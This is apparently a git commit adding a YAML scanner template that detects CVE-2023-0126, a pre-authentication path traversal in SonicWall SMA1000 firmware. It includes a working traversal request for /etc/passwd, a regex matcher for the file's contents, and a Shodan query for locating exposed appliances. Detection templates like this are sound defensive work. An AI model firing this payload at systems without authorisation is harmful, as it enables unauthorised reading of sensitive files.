Create CVE-2023-0126.yaml

patch-1
Dhiyaneshwaran 2023-06-28 01:45:29 +05:30 committed by GitHub
parent e63d1ec432
commit f145f75d65
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 40 additions and 0 deletions

View File

@ -0,0 +1,40 @@
id: CVE-2023-0126
info:
name: SonicWall SMA1000 LFI
author: tess
severity: high
description: |
Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-0126
- https://github.com/advisories/GHSA-mr28-27qx-phg3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-0126
cwe-id: CWE-22
metadata:
verified: "true"
shodan-query: title:"Appliance Management Console Login"
tags: cve,cve2023,sonicwall,lfi,sma1000
http:
- method: GET
path:
- '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: header
words:
- content/unknown
- type: status
status:
- 200